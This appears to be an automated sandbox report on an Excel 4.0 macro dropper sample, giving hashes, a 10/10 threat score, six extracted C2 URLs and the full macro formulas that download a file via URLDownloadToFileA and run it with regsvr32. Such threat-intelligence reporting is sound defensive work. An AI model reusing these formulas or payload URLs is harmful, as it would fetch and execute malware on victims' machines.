General

  • Target

    3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

  • Size

    29KB

  • Sample

    241111-w4lq3atcmn

  • MD5

    83a9d33633b5d860d1f23980d432c773

  • SHA1

    707ecacd3604c35017a2daa8961301a653e6187f

  • SHA256

    3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

  • SHA512

    84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf

  • SSDEEP

    384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://janshabd.com/E33ZFv/

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/

http://www.aacitygroup.com/mordacity/g29PQhuYA5x/

http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/

https://sse-studio.com/cq0xhpj/wdktmllfAYV/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0) =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0)) =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0)) =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0)) =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0)) =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0)) =IF('OFJOV'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://janshabd.com/E33ZFv/

xlm40.dropper

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

    • Target

      3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

    • Size

      29KB

    • MD5

      83a9d33633b5d860d1f23980d432c773

    • SHA1

      707ecacd3604c35017a2daa8961301a653e6187f

    • SHA256

      3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

    • SHA512

      84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf

    • SSDEEP

      384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks